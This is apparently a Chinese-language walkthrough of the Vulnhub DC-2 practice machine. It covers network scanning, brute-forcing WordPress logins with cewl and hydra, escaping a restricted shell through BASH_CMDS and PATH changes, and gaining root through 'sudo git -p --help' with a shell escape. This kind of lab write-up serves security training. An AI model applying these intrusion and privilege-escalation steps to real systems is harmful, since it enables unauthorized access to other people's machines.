1. 程式人生 > 實用技巧 >Vulnhub靶機實戰——DC-2

Vulnhub靶機實戰——DC-2

下載地址

https://www.five86.com/dc-2.html

環境

kali ip:192.168.232.128
靶機 ip:192.168.232.133

操作

掃靶機的ip
arp-scan -l #192.168.232.133
nmap檢視開放的埠
nmap -sVT -p- 192.168.232.133
80,7744(ssh)埠開放
ssh開放,可以爆破。
80埠開放,直接網頁放訪問192.168.232.133,顯示無法正常訪問頁面,域名變為dc-2,說明靶機做了配置,輸入ip直接跳到dc-2域名。
直接修改本地hosts檔案,新增ip對應域名。
win10路徑:C:\Windows\System32\drivers\etc
linux路徑:etc/hosts

訪問網頁發現是wordpress還有flag1,提示用cewl獲取頁面資訊生成欄位來進行密碼爆破進行登入。
cewl獲取密碼字典
cewl -w dc2_wordlist http://dc-2


用hydra爆破使用者名稱

發現jerry和tom兩個使用者

用nikto工具掃描網站結構
niko -h dc-2 -o nikto-dc2.txt
找到/wp-login.php登陸介面。
登入兩個使用者tom沒發現什麼,jerry的pages下發現了flag2,提示我們ssh登入。
ssh -p 7744 [email protected] #登陸失敗
ssh -p 7744 [email protected] #登陸成功
檢視檔案
ls
發現flag3
cat flag3
執行命令失敗,這是因為ssh遠端連線到伺服器的環境變數中不包含對應可執行檔案的路徑,只能執行less、ls、scp、vi命令。需要自行新增

BASH_CMDS[a]=/bin/sh;a 
$ /bin/bash
bash: groups: command not found
tom@DC-2:~$  export PATH=$PATH:/bin/
tom@DC-2:~$  export PATH=$PATH:/usr/bin
cat flag3.txt

參考連結:
https://blog.csdn.net/Auuuuuuuu/article/details/99607546
https://blog.csdn.net/weixin_43583637/article/details/101552825
2020-8-09 第三週
flag提示我們切換到jerry

su jerry
ls
cat flag4.txt

flag4提示我們git,想到git提權。

sudo -l    #檢視可以使用root許可權無密碼的命令,有git命令
sudo git -p –-help  #提權
!/bin/sh #提權
whoami
cd /root
ls
cat final-flag.txt

完成